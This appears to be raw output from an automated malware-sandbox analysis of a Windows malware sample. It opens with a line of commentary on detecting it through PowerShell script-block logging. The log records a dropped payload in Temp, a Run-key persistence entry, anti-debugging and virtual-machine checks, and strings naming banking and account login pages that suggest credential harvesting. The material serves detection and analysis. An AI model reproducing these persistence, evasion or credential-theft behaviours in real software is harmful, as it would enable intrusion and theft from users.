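The AMSI fragments are the better detection source: the command line is a few generic PowerShell verbs, whereas the script block that actually runs cannot avoid naming GetDelegateForFunctionPointer and DefineDynamicAssembly, which is exactly what Script Block Logging (Event ID 4104) records even when the file on disk is later deleted.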
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0796CE08 pushfd ; iretd 2_2_0796CFA5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B9BDA push edi; retf 2_2_093B9BDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B62BD push ecx; retf 2_2_093B62C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B3EA3 push eax; ret 2_2_093B3EA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B7C81 push ebp; ret 2_2_093B7C9F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093BA6E7 pushfd ; iretd 2_2_093BA6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2043225F pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204327FA pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2043283D push eax; iretd 8_2_20432858
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204609AD push ecx; mov dword ptr [esp], ecx 8_2_204609B6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_016662BD push ecx; retf 8_2_016662C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_0166A6E7 pushfd ; iretd 8_2_0166A6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01669BDA push edi; retf 8_2_01669BDB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01667C81 push ebp; ret 8_2_01667C9F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01663EA3 push eax; ret 8_2_01663EA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031609AD push ecx; mov dword ptr [esp], ecx 14_2_031609B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0046 push FFFFFF8Ch; iretd 14_2_003E0077
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D21B0 push esi; retf 14_2_003D21BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003C8208 push ds; retf 14_2_003C820A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0270 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0268 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D039F push ss; ret 14_2_003D03C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D03D1 push E16F236Ah; retn 0031h 14_2_003D03D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D43C0 push edi; retf 14_2_003D43CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DCBAE push eax; retf 14_2_003DCBB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D4FC8 pushfd ; retf 14_2_003D4FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB681 push ebp; ret 14_2_003DB68C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Overfondle.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hakkebrttet
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E rdtsc 8_2_204A096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3072
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 2.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004065CE FindFirstFileA,FindClose, 0_2_004065CE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004027AA FindFirstFileA, 0_2_004027AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose, 14_2_003DB880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 545Ni1I.14.dr Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 545Ni1I.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 545Ni1I.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 545Ni1I.14.dr Binary or memory string: dev.azure.comVMware20,11696501413j
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: Overfondle.exe, 00000008.00000002.2170573580.000000000446E000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065800892.000000000446E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 545Ni1I.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: 545Ni1I.14.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 545Ni1I.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2615832475.00000000013DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 545Ni1I.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: firefox.exe, 00000011.00000002.2458322940.0000016A1F53C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 545Ni1I.14.dr Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 545Ni1I.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 545Ni1I.14.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 545Ni1I.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 545Ni1I.14.dr Binary or memory string: global block list test formVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 545Ni1I.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 545Ni1I.14.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: discord.comVMware20,11696501413f
Source: 545Ni1I.14.dr Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E rdtsc 8_2_204A096E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0333D7B8 LdrInitializeThunk, 2_2_0333D7B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20462050 mov eax, dword ptr fs:[00000030h] 8_2_20462050
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6050 mov eax, dword ptr fs:[00000030h] 8_2_204E6050
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048C073 mov eax, dword ptr fs:[00000030h] 8_2_2048C073
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] 8_2_2047E016
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A020 mov eax, dword ptr fs:[00000030h] 8_2_2045A020
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C020 mov eax, dword ptr fs:[00000030h] 8_2_2045C020
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6030 mov eax, dword ptr fs:[00000030h] 8_2_204F6030
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E20DE mov eax, dword ptr fs:[00000030h] 8_2_204E20DE
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_2045A0E3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E60E0 mov eax, dword ptr fs:[00000030h] 8_2_204E60E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204680E9 mov eax, dword ptr fs:[00000030h] 8_2_204680E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C0F0 mov eax, dword ptr fs:[00000030h] 8_2_2045C0F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A20F0 mov ecx, dword ptr fs:[00000030h] 8_2_204A20F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046208A mov eax, dword ptr fs:[00000030h] 8_2_2046208A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204580A0 mov eax, dword ptr fs:[00000030h] 8_2_204580A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F80A8 mov eax, dword ptr fs:[00000030h] 8_2_204F80A8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205260B8 mov eax, dword ptr fs:[00000030h] 8_2_205260B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205260B8 mov ecx, dword ptr fs:[00000030h] 8_2_205260B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov ecx, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466154 mov eax, dword ptr fs:[00000030h] 8_2_20466154
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C156 mov eax, dword ptr fs:[00000030h] 8_2_2045C156
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F8158 mov eax, dword ptr fs:[00000030h] 8_2_204F8158
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534164 mov eax, dword ptr fs:[00000030h] 8_2_20534164
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20520115 mov eax, dword ptr fs:[00000030h] 8_2_20520115
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov ecx, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20490124 mov eax, dword ptr fs:[00000030h] 8_2_20490124
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h] 8_2_205261C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204901F8 mov eax, dword ptr fs:[00000030h] 8_2_204901F8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205361E5 mov eax, dword ptr fs:[00000030h] 8_2_205361E5
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A0185 mov eax, dword ptr fs:[00000030h] 8_2_204A0185
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20504180 mov eax, dword ptr fs:[00000030h] 8_2_20504180
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] 8_2_204E019F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h] 8_2_2045A197
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h] 8_2_2051C188
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h] 8_2_2051A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h] 8_2_2051A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E8243 mov eax, dword ptr fs:[00000030h] 8_2_204E8243
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E8243 mov ecx, dword ptr fs:[00000030h] 8_2_204E8243
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053625D mov eax, dword ptr fs:[00000030h] 8_2_2053625D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A250 mov eax, dword ptr fs:[00000030h] 8_2_2045A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466259 mov eax, dword ptr fs:[00000030h] 8_2_20466259
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045826B mov eax, dword ptr fs:[00000030h] 8_2_2045826B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045823B mov eax, dword ptr fs:[00000030h] 8_2_2045823B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205362D6 mov eax, dword ptr fs:[00000030h] 8_2_205362D6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] 8_2_204E0283
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h] 8_2_2049E284
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h] 8_2_2049E284
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h] 8_2_204702A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h] 8_2_204702A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov ecx, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] 8_2_204F62A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052A352 mov eax, dword ptr fs:[00000030h] 8_2_2052A352
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20508350 mov ecx, dword ptr fs:[00000030h] 8_2_20508350
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] 8_2_204E2349
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov ecx, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] 8_2_204E035C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053634F mov eax, dword ptr fs:[00000030h] 8_2_2053634F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050437C mov eax, dword ptr fs:[00000030h] 8_2_2050437C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] 8_2_2049A30B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C310 mov ecx, dword ptr fs:[00000030h] 8_2_2045C310
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20480310 mov ecx, dword ptr fs:[00000030h] 8_2_20480310
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h] 8_2_205043D4
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h] 8_2_205043D4
